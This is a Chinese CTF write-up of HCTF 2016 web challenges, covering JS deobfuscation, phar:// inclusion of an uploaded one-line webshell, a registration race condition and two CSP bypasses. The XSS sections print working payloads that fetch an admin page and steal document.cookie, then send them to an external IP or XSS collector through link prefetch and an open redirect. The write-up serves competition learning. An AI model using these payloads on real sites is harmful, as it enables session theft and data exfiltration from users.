hctf2016 web 部分WriteUp.md

这次是18还是19忘了，还是太菜了，level4开的太晚了，卡题卡了一晚上，队伍pwn和misc还有待提高，一道pwn都没有出，挺伤的。
补题发现要是再有三个小时，感觉大图书馆的牧羊人和AT feild 能出，这样就挤进前15了。不过这次也还比较满足了，毕竟新人队伍，大家都还很菜，加上这次没有安卓。。。好吧不安慰自己了，立个flag把，下一次分站赛一定要挤进前15。

要说自己也有问题，比如最后secretdata明明做出来了，结果额外至少花费了一个小时，只是因为扫描目录的时候扫到了一个phpmyadmin，觉得主办方放一个这个东西在这里加上题目名称叫secretdata，肯定有用意，然后像个智障一样一直折腾这个网页。js发过去也没有第一时间让他回传cookie，而是让admin一直访问phpmyadmin，profile.php等等的，要是直接最开始简单点直接拿cookie登陆就好了。但是这里也发现一个问题，管理员访问user.php为什么没有flag回传给我而只是一个跟我们一样的user.php，但是最后拿到cookie登陆上去的时候flag确实在user.php里面，这一点百思不得其解。

另外这次我只做出了rsa1没有搞出rsa2也是蛮遗憾的，而且到最后也不知道rsa2该怎么做。学习之路还长着呢。慢慢来啊。

算了，赛后说啥都晚了，下次加把劲把 。另外补的题忘了写wp了，有机会再怼上把。

2099年的flag

改下请求头就行了

RESTful

根据提示要用PUT，然后得到hint说是restful架构，所以直接构造一下请求就行了。

giligili

http://lorexxar.cn/2016/04/11/sctf-Obfusion/

查看源码知道是一道js解密的题目。代码如下：

var _ = { 0x4c19cff: "random", 0x4728122: "charCodeAt", 0x2138878: "substring", 0x3ca9c7b: "toString", 0x574030a: "eval", 0x270aba9: "indexOf", 0x221201f: function(_9) { var _8 = []; for (var _a = 0, _b = _9.length; _a < _b; _a++) { _8.push(Number(_9.charCodeAt(_a)).toString(16)); } return "0x" + _8.join(""); }, 0x240cb06: function(_2, _3) { var _4 = Math.max(_2.length, _3.length); var _7 = _2 + _3; var _6 = ""; for(var _5=0; _5<_4; _5++) { _6 += _7.charAt((_2.charCodeAt(_5%_2.length) ^ _3.charCodeAt(_5%_3.length)) % _4); } return _6; }, 0x5c623d0: function(_c, _d) { var _e = ""; for(var _f=0; _f<_d; _f++) { _e += _c; } return _e; } };            var $ = [ 0x4c19cff, 0x3cfbd6c, 0xb3f970, 0x4b9257a, 0x1409cc7, 0x46e990e, 0x2138878, 0x1e1049, 0x164a1f9, 0x494c61f, 0x490f545, 0x51ecfcb, 0x4c7911a, 0x29f7b65, 0x4dde0e4, 0x49f889f, 0x5ebd02c, 0x556f342, 0x3f7f3f6, 0x11544aa, 0x53ed47d, 0x697a, 0x623f21c1, 0x5c623d0, 0x32e8f8b, 0x3ca9c7b, 0x367a49b, 0x360179b, 0x5c862d6, 0x30dc1af, 0x7797d1, 0x221201f, 0x5eb4345, 0x5e9baad, 0x39b3b47, 0x32f0b8f, 0x48554de, 0x3e8b5e8, 0x5e4f31f, 0x48a53a6, 0x270aba9, 0x240cb06, 0x574030a, 0x1618f3a, 0x271259f, 0x3a306e5, 0x1d33b46, 0x17c29b5, 0x1cf02f4, 0xeb896b ];            var a, b, c, d, e, f, g, h, i, j, k, l, m, n, o, p, q, r, s, t, u, v, w, x, y, z;            function check() {                var answer = document.getElementById("message").value;                var correct = (function() {                    try {                        h = new MersenneTwister(parseInt(btoa(answer[_[$[6]]](0, 4)), 32));                        e = h[_[$[""+ +[]]]]()*(""+{})[_[0x4728122]](0xc); for(var _1=0; _1<h.mti; _1++) { e ^= h.mt[_1]; }                        l = new MersenneTwister(e), v = true;                        l.random(); l.random(); l.random();                        o = answer.split("_");                        i = l.mt[~~(h.random()*$[0x1f])%0xff];                        s = ["0x" + i[_[$[$.length/2]]](0x10), "0x" + e[_[$[$.length/2]]](0o20).split("-")[1]];                        e =- (this[_[$[42]]](_[$[31]](o[1])) ^ s[0]); if (-e != $[21]) return false;                        e ^= (this[_[$[42]]](_[$[31]](o[2])) ^ s[1]); if (-e != $[22]) return false; e -= 0x352c4a9b;                        t = new MersenneTwister(Math.sqrt(-e));                        h.random();                        a = l.random();                        t.random();                        y = [ 0xb3f970, 0x4b9257a, 0x46e990e ].map(function(i) { return $[_[$[40]]](i)+ +1+ -1- +1; });                        o[0] = o[0].substring(5); o[3] = o[3].substring(0, o[3].length - 1);                        u = ~~~~~~~~~~~~~~~~(a * i); if (o[0].length > 5) return false;                        a = parseInt(_[$[23]]("1", Math.max(o[0].length, o[3].length)), 3) ^ eval(_[$[31]](o[0]));                        r = (h.random() * l.random() * t.random()) / (h.random() * l.random() * t.random());                        e ^= ~r;                        r = (h.random() / l.random() / t.random()) / (h.random() * l.random() * t.random());                        e ^= ~~r;                        a += _[$[31]](o[3].substring(o[3].length - 2)).split("x")[1]; if (parseInt(a.split("84")[1], $.length/2) != 0x4439feb) return false;                        d = parseInt(a, 16) == (Math.pow(2, 16)+ -5+ "") + o[3].charCodeAt(o[3].length - 3).toString(16) + "53846" + (new Date().getFullYear() - 1 + "");                        i = 0xffff;                        n = (p = (f = _[$[23]](o[3].charAt(o[3].length - 4), 3)) == o[3].substring(1, 4));                        g = 3;                        t = _[$[23]](o[3].charAt(3), 3) == o[3].substring(5, 8) && o[3].charCodeAt(1) * o[0].charCodeAt(0) == 0x2ef3;                        h = ((31249*g) & i).toString(16);                        i = _[$[31]](o[3].split(f).join("").substring(0, 2)).split("x")[1];                        s = i == h;                        return (p & t & s & d) === 1 || (p & t & s & d) === true;                    } catch (e) {                        console.log("gg");                        return false;                    }                })();                document.getElementById("message").placeholder = correct ? "correct" : "wrong";                if (correct) {                    alert("Congratulations! you got it!");                } else {                    alert("Sorry, you are wrong...");                }            };

这种题放到控制台疯狂输入输出调试就行了，也没有太多技术含量，多花些时间都能做出来的。
下面fdsa d的调试代码。

var MersenneTwister = function(seed) {  if (seed == undefined) {    seed = new Date().getTime();  }  /* Period parameters */  this.N = 624;  this.M = 397;  this.MATRIX_A = 0x9908b0df;   /* constant vector a */  this.UPPER_MASK = 0x80000000; /* most significant w-r bits */  this.LOWER_MASK = 0x7fffffff; /* least significant r bits */  this.mt = new Array(this.N); /* the array for the state vector */  this.mti=this.N+1; /* mti==N+1 means mt[N] is not initialized */  this.init_genrand(seed);}/* initializes mt[N] with a seed */MersenneTwister.prototype.init_genrand = function(s) {  this.mt[0] = s >>> 0;  for (this.mti=1; this.mti<this.N; this.mti++) {      var s = this.mt[this.mti-1] ^ (this.mt[this.mti-1] >>> 30);   this.mt[this.mti] = (((((s & 0xffff0000) >>> 16) * 1812433253) << 16) + (s & 0x0000ffff) * 1812433253)  + this.mti;      /* See Knuth TAOCP Vol2. 3rd Ed. P.106 for multiplier. */      /* In the previous versions, MSBs of the seed affect   */      /* only MSBs of the array mt[].                        */      /* 2002/01/09 modified by Makoto Matsumoto             */      this.mt[this.mti] >>>= 0;      /* for >32 bit machines */  }}/* initialize by an array with array-length *//* init_key is the array for initializing keys *//* key_length is its length *//* slight change for C++, 2004/2/26 */MersenneTwister.prototype.init_by_array = function(init_key, key_length) {  var i, j, k;  this.init_genrand(19650218);  i=1; j=0;  k = (this.N>key_length ? this.N : key_length);  for (; k; k--) {    var s = this.mt[i-1] ^ (this.mt[i-1] >>> 30)    this.mt[i] = (this.mt[i] ^ (((((s & 0xffff0000) >>> 16) * 1664525) << 16) + ((s & 0x0000ffff) * 1664525)))      + init_key[j] + j; /* non linear */    this.mt[i] >>>= 0; /* for WORDSIZE > 32 machines */    i++; j++;    if (i>=this.N) { this.mt[0] = this.mt[this.N-1]; i=1; }    if (j>=key_length) j=0;  }  for (k=this.N-1; k; k--) {    var s = this.mt[i-1] ^ (this.mt[i-1] >>> 30);    this.mt[i] = (this.mt[i] ^ (((((s & 0xffff0000) >>> 16) * 1566083941) << 16) + (s & 0x0000ffff) * 1566083941))      - i; /* non linear */    this.mt[i] >>>= 0; /* for WORDSIZE > 32 machines */    i++;    if (i>=this.N) { this.mt[0] = this.mt[this.N-1]; i=1; }  }  this.mt[0] = 0x80000000; /* MSB is 1; assuring non-zero initial array */}/* generates a random number on [0,0xffffffff]-interval */MersenneTwister.prototype.genrand_int32 = function() {  var y;  var mag01 = new Array(0x0, this.MATRIX_A);  /* mag01[x] = x * MATRIX_A  for x=0,1 */  if (this.mti >= this.N) { /* generate N words at one time */    var kk;    if (this.mti == this.N+1)   /* if init_genrand() has not been called, */      this.init_genrand(5489); /* a default initial seed is used */    for (kk=0;kk<this.N-this.M;kk++) {      y = (this.mt[kk]&this.UPPER_MASK)|(this.mt[kk+1]&this.LOWER_MASK);      this.mt[kk] = this.mt[kk+this.M] ^ (y >>> 1) ^ mag01[y & 0x1];    }    for (;kk<this.N-1;kk++) {      y = (this.mt[kk]&this.UPPER_MASK)|(this.mt[kk+1]&this.LOWER_MASK);      this.mt[kk] = this.mt[kk+(this.M-this.N)] ^ (y >>> 1) ^ mag01[y & 0x1];    }    y = (this.mt[this.N-1]&this.UPPER_MASK)|(this.mt[0]&this.LOWER_MASK);    this.mt[this.N-1] = this.mt[this.M-1] ^ (y >>> 1) ^ mag01[y & 0x1];    this.mti = 0;  }  y = this.mt[this.mti++];  /* Tempering */  y ^= (y >>> 11);  y ^= (y << 7) & 0x9d2c5680;  y ^= (y << 15) & 0xefc60000;  y ^= (y >>> 18);  return y >>> 0;}/* generates a random number on [0,0x7fffffff]-interval */MersenneTwister.prototype.genrand_int31 = function() {  return (this.genrand_int32()>>>1);}/* generates a random number on [0,1]-real-interval */MersenneTwister.prototype.genrand_real1 = function() {  return this.genrand_int32()*(1.0/4294967295.0);  /* divided by 2^32-1 */}/* generates a random number on [0,1)-real-interval */MersenneTwister.prototype.random = function() {  return this.genrand_int32()*(1.0/4294967296.0);  /* divided by 2^32 */}/* generates a random number on (0,1)-real-interval */MersenneTwister.prototype.genrand_real3 = function() {  return (this.genrand_int32() + 0.5)*(1.0/4294967296.0);  /* divided by 2^32 */}/* generates a random number on [0,1) with 53-bit resolution*/MersenneTwister.prototype.genrand_res53 = function() {  var a=this.genrand_int32()>>>5, b=this.genrand_int32()>>>6;  return(a*67108864.0+b)*(1.0/9007199254740992.0);}/*CryptoJS v3.1.2code.google.com/p/crypto-js(c) 2009-2013 by Jeff Mott. All rights reserved.code.google.com/p/crypto-js/wiki/License*/var CryptoJS=CryptoJS||function(e,m){var p={},j=p.lib={},l=function(){},f=j.Base={extend:function(a){l.prototype=this;var c=new l;a&&c.mixIn(a);c.hasOwnProperty("init")||(c.init=function(){c.$super.init.apply(this,arguments)});c.init.prototype=c;c.$super=this;return c},create:function(){var a=this.extend();a.init.apply(a,arguments);return a},init:function(){},mixIn:function(a){for(var c in a)a.hasOwnProperty(c)&&(this[c]=a[c]);a.hasOwnProperty("toString")&&(this.toString=a.toString)},clone:function(){return this.init.prototype.extend(this)}},n=j.WordArray=f.extend({init:function(a,c){a=this.words=a||[];this.sigBytes=c!=m?c:4*a.length},toString:function(a){return(a||h).stringify(this)},concat:function(a){var c=this.words,q=a.words,d=this.sigBytes;a=a.sigBytes;this.clamp();if(d%4)for(var b=0;b<a;b++)c[d+b>>>2]|=(q[b>>>2]>>>24-8*(b%4)&255)<<24-8*((d+b)%4);else if(65535<q.length)for(b=0;b<a;b+=4)c[d+b>>>2]=q[b>>>2];else c.push.apply(c,q);this.sigBytes+=a;return this},clamp:function(){var a=this.words,c=this.sigBytes;a[c>>>2]&=4294967295<<32-8*(c%4);a.length=e.ceil(c/4)},clone:function(){var a=f.clone.call(this);a.words=this.words.slice(0);return a},random:function(a){for(var c=[],b=0;b<a;b+=4)c.push(4294967296*e.random()|0);return new n.init(c,a)}}),b=p.enc={},h=b.Hex={stringify:function(a){var c=a.words;a=a.sigBytes;for(var b=[],d=0;d<a;d++){var f=c[d>>>2]>>>24-8*(d%4)&255;b.push((f>>>4).toString(16));b.push((f&15).toString(16))}return b.join("")},parse:function(a){for(var c=a.length,b=[],d=0;d<c;d+=2)b[d>>>3]|=parseInt(a.substr(d,2),16)<<24-4*(d%8);return new n.init(b,c/2)}},g=b.Latin1={stringify:function(a){var c=a.words;a=a.sigBytes;for(var b=[],d=0;d<a;d++)b.push(String.fromCharCode(c[d>>>2]>>>24-8*(d%4)&255));return b.join("")},parse:function(a){for(var c=a.length,b=[],d=0;d<c;d++)b[d>>>2]|=(a.charCodeAt(d)&255)<<24-8*(d%4);return new n.init(b,c)}},r=b.Utf8={stringify:function(a){try{return decodeURIComponent(escape(g.stringify(a)))}catch(c){throw Error("Malformed UTF-8 data");}},parse:function(a){return g.parse(unescape(encodeURIComponent(a)))}},k=j.BufferedBlockAlgorithm=f.extend({reset:function(){this._data=new n.init;this._nDataBytes=0},_append:function(a){"string"==typeof a&&(a=r.parse(a));this._data.concat(a);this._nDataBytes+=a.sigBytes},_process:function(a){var c=this._data,b=c.words,d=c.sigBytes,f=this.blockSize,h=d/(4*f),h=a?e.ceil(h):e.max((h|0)-this._minBufferSize,0);a=h*f;d=e.min(4*a,d);if(a){for(var g=0;g<a;g+=f)this._doProcessBlock(b,g);g=b.splice(0,a);c.sigBytes-=d}return new n.init(g,d)},clone:function(){var a=f.clone.call(this);a._data=this._data.clone();return a},_minBufferSize:0});j.Hasher=k.extend({cfg:f.extend(),init:function(a){this.cfg=this.cfg.extend(a);this.reset()},reset:function(){k.reset.call(this);this._doReset()},update:function(a){this._append(a);this._process();return this},finalize:function(a){a&&this._append(a);return this._doFinalize()},blockSize:16,_createHelper:function(a){return function(c,b){return(new a.init(b)).finalize(c)}},_createHmacHelper:function(a){return function(b,f){return(new s.HMAC.init(a,f)).finalize(b)}}});var s=p.algo={};return p}(Math);(function(){var e=CryptoJS,m=e.lib,p=m.WordArray,j=m.Hasher,l=[],m=e.algo.SHA1=j.extend({_doReset:function(){this._hash=new p.init([1732584193,4023233417,2562383102,271733878,3285377520])},_doProcessBlock:function(f,n){for(var b=this._hash.words,h=b[0],g=b[1],e=b[2],k=b[3],j=b[4],a=0;80>a;a++){if(16>a)l[a]=f[n+a]|0;else{var c=l[a-3]^l[a-8]^l[a-14]^l[a-16];l[a]=c<<1|c>>>31}c=(h<<5|h>>>27)+j+l[a];c=20>a?c+((g&e|~g&k)+1518500249):40>a?c+((g^e^k)+1859775393):60>a?c+((g&e|g&k|e&k)-1894007588):c+((g^e^k)-899497514);j=k;k=e;e=g<<30|g>>>2;g=h;h=c}b[0]=b[0]+h|0;b[1]=b[1]+g|0;b[2]=b[2]+e|0;b[3]=b[3]+k|0;b[4]=b[4]+j|0},_doFinalize:function(){var f=this._data,e=f.words,b=8*this._nDataBytes,h=8*f.sigBytes;e[h>>>5]|=128<<24-h%32;e[(h+64>>>9<<4)+14]=Math.floor(b/4294967296);e[(h+64>>>9<<4)+15]=b;f.sigBytes=4*e.length;this._process();return this._hash},clone:function(){var e=j.clone.call(this);e._hash=this._hash.clone();return e}});e.SHA1=j._createHelper(m);e.HmacSHA1=j._createHmacHelper(m)})();/* These real versions are due to Isaku Wada, 2002/01/09 added */Array.prototype.includes||(Array.prototype.includes=function(a){"use strict";var b=Object(this),c=parseInt(b.length)||0;if(0===c)return!1;var e,d=parseInt(arguments[1])||0;d>=0?e=d:(e=c+d,0>e&&(e=0));for(var f;c>e;){if(f=b[e],a===f||a!==a&&f!==f)return!0;e++}return!1});var _ = { 0x4c19cff: "random", 0x4728122: "charCodeAt", 0x2138878: "substring", 0x3ca9c7b: "toString", 0x574030a: "eval", 0x270aba9: "indexOf", 0x221201f: function(_9) { var _8 = []; for (var _a = 0, _b = _9.length; _a < _b; _a++) { _8.push(Number(_9.charCodeAt(_a)).toString(16)); } return "0x" + _8.join(""); }, 0x240cb06: function(_2, _3) { var _4 = Math.max(_2.length, _3.length); var _7 = _2 + _3; var _6 = ""; for(var _5=0; _5<_4; _5++) { _6 += _7.charAt((_2.charCodeAt(_5%_2.length) ^ _3.charCodeAt(_5%_3.length)) % _4); } return _6; }, 0x5c623d0: function(_c, _d) { var _e = ""; for(var _f=0; _f<_d; _f++) { _e += _c; } return _e; } };            var $ = [ 0x4c19cff, 0x3cfbd6c, 0xb3f970, 0x4b9257a, 0x1409cc7, 0x46e990e, 0x2138878, 0x1e1049, 0x164a1f9, 0x494c61f, 0x490f545, 0x51ecfcb, 0x4c7911a, 0x29f7b65, 0x4dde0e4, 0x49f889f, 0x5ebd02c, 0x556f342, 0x3f7f3f6, 0x11544aa, 0x53ed47d, 0x697a, 0x623f21c1, 0x5c623d0, 0x32e8f8b, 0x3ca9c7b, 0x367a49b, 0x360179b, 0x5c862d6, 0x30dc1af, 0x7797d1, 0x221201f, 0x5eb4345, 0x5e9baad, 0x39b3b47, 0x32f0b8f, 0x48554de, 0x3e8b5e8, 0x5e4f31f, 0x48a53a6, 0x270aba9, 0x240cb06, 0x574030a, 0x1618f3a, 0x271259f, 0x3a306e5, 0x1d33b46, 0x17c29b5, 0x1cf02f4, 0xeb896b ];            var a, b, c, d, e, f, g, h, i, j, k, l, m, n, o, p, q, r, s, t, u, v, w, x, y, z;            function check() {        var answer ="hctf{wh3r3_iz_y0ur_neee3eeed??}"                var correct = (function() {                    try {                        h = new MersenneTwister(parseInt(btoa(answer[_[$[6]]](0, 4)), 32));                        e = h[_[$[""+ +[]]]]()*(""+{})[_[0x4728122]](0xc); for(var _1=0; _1<h.mti; _1++) { e ^= h.mt[_1]; }                        console.log("e:"+e);                        l = new MersenneTwister(e), v = true;                        l.random(); l.random(); l.random();                        o = answer.split("_");                        i = l.mt[~~(h.random()*$[0x1f])%0xff];                        console.log("i:"+i);                        s = ["0x" + i[_[$[$.length/2]]](0x10), "0x" + e[_[$[$.length/2]]](0o20).split("-")[1]];                        console.log("s:"+s);                        console.log(this[_[$[42]]](_[$[31]](o[1])) ^ s[0]);                        e =-(this[_[$[42]]](_[$[31]](o[1])) ^ s[0]); if (-e != $[21]) return false;                        console.log("e2:"+e);                        e ^= (this[_[$[42]]](_[$[31]](o[2])) ^ s[1]); if (-e != $[22]) return false; e -= 0x352c4a9b;                        console.log("e3:"+e);                        t = new MersenneTwister(Math.sqrt(-e));                        h.random();                        a = l.random();                        t.random();                        y = [ 0xb3f970, 0x4b9257a, 0x46e990e ].map(function(i) { return $[_[$[40]]](i)+ +1+ -1- +1; });                        console.log("y:"+y);                        o[0] = o[0].substring(5);                        o[3] = o[3].substring(0, o[3].length - 1);                        a = parseInt(_[$[23]]("1", Math.max(o[0].length, o[3].length)), 3) ^ eval(_[$[31]](o[0]));                        console.log("a:"+a);                        console.log("a2:"+parseInt(_[$[23]]("1", Math.max(o[0].length, o[3].length)), 3));                        r = (h.random() * l.random() * t.random()) / (h.random() * l.random() * t.random());                        e ^= ~r;                        console.log("e4:"+e);                        r = (h.random() / l.random() / t.random()) / (h.random() * l.random() * t.random());                        e ^= ~~r;                        console.log("e5:"+e);                        console.log(_[$[31]](o[3].substring(o[3].length - 2)));                        a += _[$[31]](o[3].substring(o[3].length - 2)).split("x")[1];                        console.log($.length/2);                        console.log(parseInt(a, 16));                        console.log((Math.pow(2, 16)+ -5+ "") + o[3].charCodeAt(o[3].length - 3).toString(16) + "53846" + (new Date().getFullYear() - 1 + ""));                        if (parseInt(a.split("84")[1], $.length/2) != 0x4439feb) return false;                        console.log(1);                        d = parseInt(a, 16) == (Math.pow(2, 16)+ -5+ "") + o[3].charCodeAt(o[3].length - 3).toString(16) + "53846" + (new Date().getFullYear() - 1 + "");                        i = 0xffff;                        n = (p = (f = _[$[23]](o[3].charAt(o[3].length - 4), 3)) == o[3].substring(1, 4));                        g = 3;                        t = _[$[23]](o[3].charAt(3), 3) == o[3].substring(5, 8) && o[3].charCodeAt(1) * o[0].charCodeAt(0) == 0x2ef3;                        console.log(d+n+t);                        h = ((31249*g) & i).toString(16);                        console.log(o[3].split(f).join("").substring(0, 2));                        i = _[$[31]](o[3].split(f).join("").substring(0, 2)).split("x")[1];                        console.log(h+":"+i);                        s = i == h;                        return (p & t & s & d) === 1 || (p & t & s & d) === true;                    } catch (e) {                        console.log("error!");                        return false;                    }                })();                console.log("correct:"+correct);            };check();

兵者多诡

这里有一个上传点，有一个文件包含点。

先利用文件包含拿到网页源码，发现直接包含上传的图片没有办法包含，那么就考虑伪协议，最后利用phar协议搞定。

创建一个0.php，写入一句话木马，然后压缩，把压缩包改名为0.png后缀上传，最后直接利用phar协议执行命令，如下图所示：

必须比香港记者还要快

一道时间竞争。

扫一下目录，发现目录下有README.md，内容如下：

# 跑得比谁都快## ChangeLog 的故事## 这里是加了.git之后忘删的README.md  XD by Aklis## ChangeLog- 2016.11.11完成登陆功能，登陆之后在session将用户名和用户等级放到会话信息里面。判断sessioin['level']是否能在index.php查看管理员才能看到的**东西**。XD- 2016.11.10老板说注册成功的用户不能是管理员，我再写多一句把权限降为普通用户好啰。- 2016.10我把注册功能写好了

观察说是再写多一句把权限降为普通用户，那么很容易想到就是时间竞争，多线程登陆，然后在它还没有执行降权限时登陆上去就可以了，当时用burp直接开两个intruder，一个跑注册，一个跑登陆，然后勾选跟随重定向就可以了，线程数设大一点就能直接拿到flag`，这里最后没有截图就算了，反正也没有太多技术含量

guestbook

一道绕过CSP的题目，首先需要爆破md5，写个代码如下：

from hashlib import *while 1:    string=raw_input("md5: ")    for i in xrange(100000000):        if md5(str(i)).hexdigest()[0:4] == string:            print str(i)            break

然后开始尝试，发现它过滤了很多，但是规则是把像是script、on、link等都替换为空，但没有递归替换什么的，所以复写两次就能绕过过滤，然后是同源策略的问题，如下：

content-security-policy:default-src 'self'; script-src 'self' 'unsafe-inline'; font-src 'self' fonts.gstatic.com; style-src 'self' 'unsafe-inline'; img-src 'self'    

他能够执行内联脚本，然后根据链接http://lorexxar.cn/2016/08/08/ccsp/#object-src，我们知道通过<link rel="prefetch" herf="xxx">能够绕过，所以我这里搞的比较复杂，我是内联执行一个js去访问页面，然后构造一个link标签herf到我的xss平台，如下：

</li><scrscriptipt src="./js/jquery.min.js"></scriscriptpt><scriscriptpt>$.get("http://guestbook.hctf.io/admin_lorexxar.php",functioonn(data,status){      var head = document.getElementsByTagName("body")[0];      var cssURL="http://104.160.43.154/xss/?a="+escape(data);      var Tag = document.createElement("lilinknk");      Tag.href = cssURL;      Tag.setAttribute("rel","prefetch");      head.appendChild(Tag);})</scscriptript><li>

然后去xss平台收取flag就行了，如下：

图中第四行就是我们的flag了。

secret data

又是一道绕过同源策略的题目，不过这里不能执行内联脚本了，同源策略如下：

default-src 'self';script-src http://sguestbook.hctf.io/static/ 'sha256-n+kMAVS5Xj7r/dvV9ZxAbEX6uEmK+uen+HZXbLhVsVA=' 'sha256-2zDCsAh4JN1o1lpARla6ieQ5KBrjrGpn0OAjeJ1V9kg=' 'sha256-SQQX1KpZM+ueZs+PyglurgqnV7jC8sJkUMsG9KkaFwQ=' 'sha256-JXk13NkH4FW9/ArNuoVR9yRcBH7qGllqf1g5RnJKUVg=' 'sha256-NL8WDWAX7GSifPUosXlt/TUI6H8JU0JlK7ACpDzRVUc=' 'sha256-CCZL85Vslsr/bWQYD45FX+dc7bTfBxfNmJtlmZYFxH4=' 'sha256-2Y8kG4IxBmLRnD13Ne2JV/V106nMhUqzbbVcOdxUH8I=' 'sha256-euY7jS9jMj42KXiApLBMYPZwZ6o97F7vcN8HjBFLOTQ=' 'sha256-V6Bq3u346wy1l0rOIp59A6RSX5gmAiSK40bp5JNrbnw=';font-src http://sguestbook.hctf.io/static/ fonts.gstatic.com;style-src 'self' 'unsafe-inline';img-src 'self'

它智能执行static的js脚本，这就比较头大了，虽然说找到一个上传点在profile.php，但是它的上传位置在upload下面，没办法直接引用。

后来扫目录在它的static目录下发现一个redirect.php文件，参数为u，可以重定向到u指向的网页，那么就好办了，用src指向redirect.php，然后重定向到upload下我们上传的js文件就好了。

上传的js文件如下：

$.get("http://sguestbook.hctf.io/profile.php",function(data,status){      var head = document.getElementsByTagName("body")[0];    var cssURL="[xss平台的url地址]?a="+document.cookie+"|"+escape(data);    var Tag = document.createElement("link");     Tag.href = cssURL;     Tag.setAttribute("rel","prefetch");    head.appendChild(Tag);})

我这里的js是让他顺带访问下profile.php，要是它把cookie放在profile.php里面就直接搞定了。

payload如下：

<scrscriptipt src="./static/js/jquery.min.js"></scriscriptpt><scscriptript src="static/redirect.php?u=redirect.php?u=http://sguestbook.hctf.io/upload/xxxxxxxx"></scscriptript>

cookie如下：

拿到cookie之后登陆拿到flag如下图：

PS:这里扫到了phpmyadmin。。。。